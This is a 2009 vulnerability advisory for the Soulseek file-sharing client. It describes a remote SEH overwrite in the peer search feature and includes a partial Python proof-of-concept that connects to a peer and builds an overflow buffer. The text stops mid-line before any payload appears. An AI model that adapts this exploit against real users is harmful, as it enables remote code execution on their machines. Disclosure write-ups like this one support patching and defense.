Soulseek 157 NS < 13e & 156.* Remote Peer Search Code Execution
=============================================

- Release date: July 02, 2009
- Discovered by: Laurent Gaffié ; http://g-laurent.blogspot.com/
- Severity: critical

=============================================

I. VULNERABILITY
-------------------------

Soulseek 157 NS < 13e & 156.* Remote Peer Search Code Execution

II. BACKGROUND
-------------------------

"Soulseek(tm) is a unique ad-free, spyware free, and just plain free file sharing application. One of the things that makes Soulseek(tm) unique is our community and community-related features. Based on peer-to-peer technology, virtual rooms allow you to meet people with the same interests, share information, and chat freely using real-time messages in public or private. Soulseek(tm), with its built-in people matching system, is a great way to make new friends and expand your mind!"

III. DESCRIPTION
-------------------------

The Soulseek client allows direct peer file search, letting a user find the files they want directly on a peer's computer. Unfortunately, this feature is vulnerable to a remote SEH overwrite.

IV. PROOF OF CONCEPT
-------------------------

This proof of concept will target a user called 123yow123.

import struct
import sys, socket
from time import *

ip = "IP_ADDR"
port = "PORT_NUM" #You can find out, how to find out IP/PORT if you RTFM :)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((ip,port))
except:
    print "Can\'t connect to peer!\n"
    sys.exit(0)

junk = "\x41" * 3084
next_seh = struct.pack('